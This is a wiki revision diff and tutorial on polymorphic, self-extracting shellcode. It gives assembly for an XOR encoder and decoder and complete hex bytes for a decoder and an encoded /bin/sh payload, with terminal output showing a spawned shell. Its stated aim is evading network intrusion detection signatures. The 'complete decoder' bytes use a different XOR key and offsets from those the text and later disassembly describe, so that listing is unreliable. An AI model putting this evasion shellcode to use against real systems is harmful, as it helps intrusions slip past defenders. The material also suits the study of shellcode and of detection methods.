Difference between revisions of "Shellcode/Self-modifying"
(→The unpacker) |
|||
Line 7: | Line 7: | ||
== The encoder == | == The encoder == | ||
− | + | A XOR encoding will be used for this, but the method could easily be expanded. There are hundreds of encoding, encryption, and compression algorithms that could be implemented such as xor, inc, dec, add, sub, imul, idiv and any other function that can be reversed to its original state, this is just a small example. For this encoder, each byte will be XOR'd with 0x3 and moved back into the buffer in a loop. This binary can be written to file or piped to hexdump or ndisasm for further analysis. | |
=== 64 bit === | === 64 bit === | ||
Line 27: | Line 27: | ||
</source>}} | </source>}} | ||
− | In this 64 bit snippet of | + | In this 64 bit snippet of the encoder ([[Shellcode/Appendix#packer.s|source]]), the length of the shellcode (passed as a command line argument) is counted. The lowest bit of the %rdi register, %dil, which is zero is compared to the first character of our argument we stored in %rbx. If the tested byte is equal to zero the code jumps to the write label to print the encoded output. If the byte is not equal it is XOR'd with 0x3 (note that 0x3 was chosen because the shellcode used does not contain this byte, this will need be to be changed if the shellcode contains 0x3) and increment the counter which is stored in %rsi and jump back to the counter label. The reason the length must be counted is the write syscall needs to know the number of bytes to print off the stack so instead of looping once to count the characters and looping again to encode them the two processes are combined for efficiency. |
=== 32 bit === | === 32 bit === | ||
Line 48: | Line 48: | ||
</source>}} | </source>}} | ||
− | The difference between the 64 bit and 32 bit code is subtle. The main difference is that | + | The difference between the 64 bit and 32 bit code is subtle. The main difference is that %dil does not exist in 32 bit code and thus %edx is used in place of %rdi. Another difference is the write label. It uses the [[Linux_assembly#Unlinked_System_Calls_for_32_bit_systems|32 bit C calling convention]] for write instead of the [[Linux_assembly#Unlinked_system_calls_for_64_bit_systems|64 bit calling convention]]. |
== The unpacker == | == The unpacker == | ||
− | + | Next, an unpacker is necessary, this will be essentially the same as the loader code with some changes. | |
− | First, | + | First, the shellcode must be read from the stack instead of as command line arguments. To do this, a [[Shellcode/Environment#GetPc|getpc function]] needs to be implemented to retrieve the current instruction pointer so the [[shellcode]] can be found on the stack. When calling forwards, [[Null-free_shellcode|null bytes]] are added as operands to the call instruction unless call short is explicitly defined but ultimately it is always best to call backwards for multiple reasons (including the call stack). So, the code starts with a "jmp start" instruction. |
{{code|text=<source lang="asm"> | {{code|text=<source lang="asm"> | ||
jmp start | jmp start | ||
</source>}} | </source>}} | ||
− | Getpc is called and the address of the next instruction is returned in %eax or %rbx based on architecture, then | + | Getpc is called and the address of the next instruction is returned in %eax or %rbx based on architecture, then the number of bytes in the rest of the decoder code is added to this address; this gets the absolute address of the encoded shellcode on the stack. To find the decoder offset the decoder must be completed and then run through objdump. From there take the address immediately after the getpc call and subtract it from the last address of the decoder (remember to add some bytes to the last address for the instructions on that line.) |
For example: | For example: | ||
Line 74: | Line 74: | ||
</source>}} | </source>}} | ||
− | The address that would be returned from the getpc call would be 8048080 and | + | The address that would be returned from the getpc call would be 8048080 and the last address in the application is 80480a8 then add two bytes to that since there is a 2 byte instruction on that line. The real end address of the decoder in this example would be 80480aa. From there take the returned address and the ending address and substract them to determine the offset to add. In this case the offset to add would be 0xAA - 0x80 which is 0x2A. |
{{code|text=<source lang="asm"> | {{code|text=<source lang="asm"> | ||
Line 82: | Line 82: | ||
</source>}} | </source>}} | ||
− | Next, | + | Next, the address of the shellcode is pushed onto the stack and the "inject" function is called. |
{{code|text=<source lang="asm"> | {{code|text=<source lang="asm"> | ||
Line 89: | Line 89: | ||
</source>}} | </source>}} | ||
− | The call instruction pushes the address of the next instruction (where the program is supposed to return to) onto the stack and then jumps to the function, in this case that address will be | + | The call instruction pushes the address of the next instruction (where the program is supposed to return to) onto the stack and then jumps to the function, in this case that address will be the exit function. The return address (the address of exit) is then popped off of the stack. The return address is then popped from the stack to change the return address to the decoded shellcode. |
{{code|text=<source lang="asm"> | {{code|text=<source lang="asm"> | ||
Line 96: | Line 96: | ||
</source>}} | </source>}} | ||
− | Then | + | Then the copying loop is initialized: |
{{code|text=<source lang="asm"> | {{code|text=<source lang="asm"> | ||
xor %rsi, %rsi # zero out counter | xor %rsi, %rsi # zero out counter | ||
Line 103: | Line 103: | ||
</source>}} | </source>}} | ||
− | First | + | First, make sure that the encoded shellcode has not ended (the shellcode in this example is 0x20 terminated, choose a byte that is not used in the shellcode if 0x20 is in use). |
{{code|text=<source lang="asm"> | {{code|text=<source lang="asm"> | ||
Line 111: | Line 111: | ||
</source>}} | </source>}} | ||
− | If not, | + | If not, decode a single byte by [[xor|XOR]]'ing it against the encode-byte: |
{{code|text=<source lang="asm"> | {{code|text=<source lang="asm"> | ||
Line 118: | Line 118: | ||
</source>}} | </source>}} | ||
− | Then | + | Then the XOR'd byte is then copied back into the shellcode: |
{{code|text=<source lang="asm"> | {{code|text=<source lang="asm"> | ||
movb %r10b, (%rax, %rsi, 1) | movb %r10b, (%rax, %rsi, 1) | ||
</source>}} | </source>}} | ||
− | Now | + | Now the counter is increment and the code jumps to the beginning of inject_loop: |
{{code|text=<source lang="asm"> | {{code|text=<source lang="asm"> | ||
inc %rsi | inc %rsi | ||
Line 130: | Line 130: | ||
− | After the loop is completed, | + | After the loop is completed, the ret opcode (0xc3) is appended to the decoded shellcode. |
{{code|text=<source lang="asm"> | {{code|text=<source lang="asm"> | ||
inject_finished: | inject_finished: | ||
Line 137: | Line 137: | ||
</source>}} | </source>}} | ||
− | Next, | + | Next, a call stack is formed by pushing the original return address (the address of exit that was popped off the stack at the beginning of this function), and then the address of the shellcode and return. Because the address of our shellcode has replaced the address of exit on our stack, we will return into the shellcode, which will in turn return into our exit function, exiting cleanly. |
{{code|text=<source lang="asm"> | {{code|text=<source lang="asm"> |
Revision as of 11:08, 26 November 2012
Polymorphic and other self-modifying (such as self-extracting) shellcode can be used to obfuscate or help prevent the reverse engineering of the shellcode. Additionally, it can help to prevent signature-based shellcode recognition on the network layer by NIDS or NIPS systems. The example in this article is based on shellcode loaders (sources).
Contents
The encoder
A XOR encoding will be used for this, but the method could easily be expanded. There are hundreds of encoding, encryption, and compression algorithms that could be implemented such as xor, inc, dec, add, sub, imul, idiv and any other function that can be reversed to its original state, this is just a small example. For this encoder, each byte will be XOR'd with 0x3 and moved back into the buffer in a loop. This binary can be written to file or piped to hexdump or ndisasm for further analysis.
64 bit
count_chars: cmpb %dil, (%rbx, %rsi, 1) je write xor $0x3, (%rbx, %rsi, 1) inc %rsi jmp count_chars #counts characters and xor encodes them write: mov $0x1, %rax mov $0x1, %rdi mov %rsi, %rdx mov %rbx, %rsi syscall |
In this 64 bit snippet of the encoder (source), the length of the shellcode (passed as a command line argument) is counted. The lowest bit of the %rdi register, %dil, which is zero is compared to the first character of our argument we stored in %rbx. If the tested byte is equal to zero the code jumps to the write label to print the encoded output. If the byte is not equal it is XOR'd with 0x3 (note that 0x3 was chosen because the shellcode used does not contain this byte, this will need be to be changed if the shellcode contains 0x3) and increment the counter which is stored in %rsi and jump back to the counter label. The reason the length must be counted is the write syscall needs to know the number of bytes to print off the stack so instead of looping once to count the characters and looping again to encode them the two processes are combined for efficiency.
32 bit
count_chars: cmpb %dl, (%ecx, %ebx, 1) je write xor $0x3, (%ecx, %ebx, 1) inc %ebx jmp count_chars #counts characters and xor encodes them write: push $4 pop %eax mov %ebx, %edx push $2 pop %ebx int $0x80 |
The difference between the 64 bit and 32 bit code is subtle. The main difference is that %dil does not exist in 32 bit code and thus %edx is used in place of %rdi. Another difference is the write label. It uses the 32 bit C calling convention for write instead of the 64 bit calling convention.
The unpacker
Next, an unpacker is necessary, this will be essentially the same as the loader code with some changes.
First, the shellcode must be read from the stack instead of as command line arguments. To do this, a getpc function needs to be implemented to retrieve the current instruction pointer so the shellcode can be found on the stack. When calling forwards, null bytes are added as operands to the call instruction unless call short is explicitly defined but ultimately it is always best to call backwards for multiple reasons (including the call stack). So, the code starts with a "jmp start" instruction.
jmp start |
Getpc is called and the address of the next instruction is returned in %eax or %rbx based on architecture, then the number of bytes in the rest of the decoder code is added to this address; this gets the absolute address of the encoded shellcode on the stack. To find the decoder offset the decoder must be completed and then run through objdump. From there take the address immediately after the getpc call and subtract it from the last address of the decoder (remember to add some bytes to the last address for the instructions on that line.)
For example:
0804807b <start>: 804807b: e8 f7 ff ff ff call 8048077 <getpc> 8048080: 89 c2 mov %eax,%edx 8048082: 83 c2 2a add $0x2a,%edx #shortened for easier reading 80480a8: cd 80 int $0x80 |
The address that would be returned from the getpc call would be 8048080 and the last address in the application is 80480a8 then add two bytes to that since there is a 2 byte instruction on that line. The real end address of the decoder in this example would be 80480aa. From there take the returned address and the ending address and substract them to determine the offset to add. In this case the offset to add would be 0xAA - 0x80 which is 0x2A.
start: call getpc add $0x31,%rbx # add the length of the rest of the decoder to the instruction pointer to get the address of the encoded payload |
Next, the address of the shellcode is pushed onto the stack and the "inject" function is called.
push %rbx # push address of shellcode call inject |
The call instruction pushes the address of the next instruction (where the program is supposed to return to) onto the stack and then jumps to the function, in this case that address will be the exit function. The return address (the address of exit) is then popped off of the stack. The return address is then popped from the stack to change the return address to the decoded shellcode.
inject: pop %rdi # pop the return address (to exit) |
Then the copying loop is initialized:
xor %rsi, %rsi # zero out counter push %rsi pop %rdi |
First, make sure that the encoded shellcode has not ended (the shellcode in this example is 0x20 terminated, choose a byte that is not used in the shellcode if 0x20 is in use).
inject_loop: cmpb $0x20, (%rax, %rsi, 1) je inject_finished |
If not, decode a single byte by XOR'ing it against the encode-byte:
movb (%rax, %rsi, 1), %r10b xor $0x3, %r10b |
Then the XOR'd byte is then copied back into the shellcode:
movb %r10b, (%rax, %rsi, 1) |
Now the counter is increment and the code jumps to the beginning of inject_loop:
inc %rsi jmp inject_loop |
After the loop is completed, the ret opcode (0xc3) is appended to the decoded shellcode.
inject_finished: inc %rsi movb $0xc3, (%rax, %rsi, 1) # append 0xc3 (the ret opcode) |
Next, a call stack is formed by pushing the original return address (the address of exit that was popped off the stack at the beginning of this function), and then the address of the shellcode and return. Because the address of our shellcode has replaced the address of exit on our stack, we will return into the shellcode, which will in turn return into our exit function, exiting cleanly.
push %rdi # push original return address onto stack push %rax # push address of shellcode to stack ret # return into shellcode |
When the shellcode finishes, it will execute the "ret" instruction we appended (0xc3) and return into exit; exiting cleanly.
Our complete decoder is:
- \xeb\x2c\x5f\x48\x31\xf6\x56\x5f\x80\x3c\x33\x20\x74\x11\x44\x8a\x14\x33\x41\x80\xf2\x11\x44\x88\x14\x33\x48\xff\xc6\xeb\xe9\x48\xff\xc6\xc6\x04\x33\xc3\x57\x53\xc3\x48\x8b\x1c\x24\xc3\xe8\xf6\xff\xff\xff\x48\x83\xc3\x0e\x53\xe8\xc5\xff\xff\xff\x6a\x3c\x58\x48\x31\xff\x0f\x05
Self-extracting code
Self-extracting shellcode can extract itself onto executable memory, to do this we will perform a call to mmap() as detailed in this section. We will use the same shellcode as before but with some changes. In the start function we will call mmap() and save the pointer in %rax. We push this onto the stack before the address to the shellcode and call inject. We pop this address into %rcx and inside the inject_loop we copy the xor'd byte into the mmap()'d memory instead of back into the shellcode. Finally, we return into the mmap()'d memory instead of the shellcode. The completed code:
inject_loop: cmpb $0x20, (%rax, %rsi, 1) je inject_finished movb (%rax, %rsi, 1), %r10b xor $0x3, %r10b movb %r10b, (%rcx, %rsi, 1) inc %rsi jmp inject_loop inject_finished: inc %rsi movb $0xc3, (%rcx, %rsi, 1) push %rdi push %rcx ret |
Tying it together
To use this shellcode, your payload should look like:
[decoder shellcode][encoded payload][0x20]
A usage example:
╭─user@host ~ ╰─➤ ./packer "$(echo -en "\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58 \x0f\x05");" |hexdump -C |sed 's/^[0-9a-f]........//g' |sed 's/|.*|$//g' |sed 's/ / /g' |sed 's/ /\\x/g' |sed 's/\\x\\x//g' |sed 's/\\x$//g' |grep x |awk '{printf("%s ", $0)}' |sed 's/ //g'
- \x4b\x32\xfc\x69\x6a\x5b\x0c\x06\x54\x54\x5d\x59\x4b\xbc\x69\x2c\x61\x6a\x6d\x2c\x70\x6b\x4b\xc2\xec\x0b\x54\x57\x5c\x69\x38\x5b\x0c\x06
- Add "\x20" to the end of our newly encoded shellcode as a terminator.
- Append the newly terminated shellcode to the decoder shellcode.
- Test the polymorphic code:
╭─user@host ~ ╰─➤ ./loader "$(echo -en "\xeb\x2c\x5f\x48\x31\xf6\x56\x5f\x80\x3c\x33\x20\x74\x11\x44\x8a\x14\x33\x41\x80\xf2\x11\x44\x88\x14\x33\x48\xff\xc6\xeb\xe9\x48\xff\xc6\xc6\x04\x33 \xc3\x57\x53\xc3\x48\x8b\x1c\x24\xc3\xe8\xf6\xff\xff\xff\x48\x83\xc3\x0e\x53\xe8\xc5\xff\xff\xff\x6a\x3c\x58\x48\x31\xff\x0f\x05\x4b\x32\xfc\x69\x6a \x5b\x0c\x06\x54\x54\x5d\x59\x4b\xbc\x69\x2c\x61\x6a\x6d\x2c\x70\x6b\x4b\xc2\xec\x0b\x54\x57\x5c\x69\x38\x5b\x0c\x06\x20")" [rorschach@bastille ~]$ exit exit ╭─user@host ~ ╰─➤
When we encode the 34 byte /bin/sh shellcode and disassemble it, it looks like:
╭─user@host ~ ╰─➤ ./packer "$(echo -en "\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58 \x0f\x05");" > shellcode; objdump -b binary -m i386 -M x86-64 -D shellcode shellcode: file format binary Disassembly of section .data: 00000000 <.data>: 0: 4b 32 fc rex.WXB xor %r12b,%dil 3: 69 6a 5b 0c 06 54 54 imul $0x5454060c,0x5b(%rdx),%ebp a: 5d pop %rbp b: 59 pop %rcx c: 4b bc 69 2c 61 6a 6d rex.WXB movabs $0x6b702c6d6a612c69,%r12 13: 2c 70 6b 16: 4b c2 ec 0b rex.WXB retq $0xbec 1a: 54 push %rsp 1b: 57 push %rdi 1c: 5c pop %rsp 1d: 69 38 5b 0c 06 38 imul $0x38060c5b,(%rax),%edi ╭─user@host ~ ╰─➤ |
This doesn't look anything like an execve() routine. If we disassemble the entire payload we get:
╭─user@host ~ ╰─➤ echo -en "\xeb\x2e\x5f\x58\x59\x48\x31\xf6\x56\x5f\x80\x3c\x30\x20\x74\x11\x44\x8a\x14\x30\x41\x80\xf2\x03\x44\x88\x14\x31\x48\xff\xc6\xeb\xe9\x48\xff\xc6 \xc6\x04\x31\xc3\x57\x51\xc3\x48\x8b\x1c\x24\xc3\xe8\xf6\xff\xff\xff\x48\x83\xc3\x31\x6a\x09\x58\x48\x31\xff\x57\x5e\x48\xff\xc6\x48\xc1\xe6\x12\x6a\x07\x5a\x6a \x22\x41\x5a\x57\x57\x41\x58\x41\x59\x0f\x05\x50\x53\xe8\xa4\xff\xff\xff\x6a\x3c\x58\x48\x31\xff\x0f\x05\x4b\x32\xfc\x69\x6a\x5b\x0c\x06\x54\x54\x5d\x59\x4b\xbc \x69\x2c\x61\x6a\x6d\x2c\x70\x6b\x4b\xc2\xec\x0b\x54\x57\x5c\x69\x38\x5b\x0c\x06\x20" > shellcode; objdump -b binary -m i386 -M x86-64 -D shellcode shellcode: file format binary Disassembly of section .data: 00000000 <.data>: 0: eb 2e jmp 0x30 2: 5f pop %rdi 3: 58 pop %rax 4: 59 pop %rcx 5: 48 31 f6 xor %rsi,%rsi 8: 56 push %rsi 9: 5f pop %rdi a: 80 3c 30 20 cmpb $0x20,(%rax,%rsi,1) e: 74 11 je 0x21 10: 44 8a 14 30 mov (%rax,%rsi,1),%r10b 14: 41 80 f2 03 xor $0x3,%r10b 18: 44 88 14 31 mov %r10b,(%rcx,%rsi,1) 1c: 48 ff c6 inc %rsi 1f: eb e9 jmp 0xa 21: 48 ff c6 inc %rsi 24: c6 04 31 c3 movb $0xc3,(%rcx,%rsi,1) 28: 57 push %rdi 29: 51 push %rcx 2a: c3 retq 2b: 48 8b 1c 24 mov (%rsp),%rbx 2f: c3 retq 30: e8 f6 ff ff ff callq 0x2b 35: 48 83 c3 31 add $0x31,%rbx 39: 6a 09 pushq $0x9 3b: 58 pop %rax 3c: 48 31 ff xor %rdi,%rdi 3f: 57 push %rdi 40: 5e pop %rsi 41: 48 ff c6 inc %rsi 44: 48 c1 e6 12 shl $0x12,%rsi 48: 6a 07 pushq $0x7 4a: 5a pop %rdx 4b: 6a 22 pushq $0x22 4d: 41 5a pop %r10 4f: 57 push %rdi 50: 57 push %rdi 51: 41 58 pop %r8 53: 41 59 pop %r9 55: 0f 05 syscall 57: 50 push %rax 58: 53 push %rbx 59: e8 a4 ff ff ff callq 0x2 5e: 6a 3c pushq $0x3c 60: 58 pop %rax 61: 48 31 ff xor %rdi,%rdi 64: 0f 05 syscall 66: 4b 32 fc rex.WXB xor %r12b,%dil 69: 69 6a 5b 0c 06 54 54 imul $0x5454060c,0x5b(%rdx),%ebp 70: 5d pop %rbp 71: 59 pop %rcx 72: 4b bc 69 2c 61 6a 6d rex.WXB movabs $0x6b702c6d6a612c69,%r12 79: 2c 70 6b 7c: 4b c2 ec 0b rex.WXB retq $0xbec 80: 54 push %rsp 81: 57 push %rdi 82: 5c pop %rsp 83: 69 38 5b 0c 06 20 imul $0x20060c5b,(%rax),%edi |